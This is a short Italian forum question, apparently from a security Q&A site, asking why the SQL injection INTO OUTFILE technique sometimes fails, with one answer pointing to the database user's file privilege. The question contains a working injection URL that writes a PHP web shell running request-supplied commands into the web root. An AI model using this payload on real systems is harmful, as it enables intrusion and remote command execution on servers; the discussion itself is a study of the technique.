Perché la tecnica di SQL Injection INTO OUTFILE a volte non funziona? [chiuso]

Naviga le tue risposte
0

Perché la tecnica di SQL Injection INTO OUTFILE a volte non funziona?

http://example.com/file.php?id=1 union select 1,"<?php system($_REQUEST['cmd'])?>",3,4 INTO OUTFILE " /var/www/website/public_html/shell.php"

C'è qualche soluzione per questo quando non lo fa?

    
posta Sec Researcher 27.09.2015 - 02:35
fonte

1 risposta

3

Dipende dai privilegi che ha il dbuser. Se non ci sono privilegi di file, in outfile non funziona. Nessun bypass per questo.

    
risposta data 27.09.2015 - 04:05
fonte

Leggi altre domande sui tag

C'è qualche problema con l'uso di sali vuoti con PBDKF per questo scopo? Perché SYSTEM non riesce a garantire SeTcbPrivilege?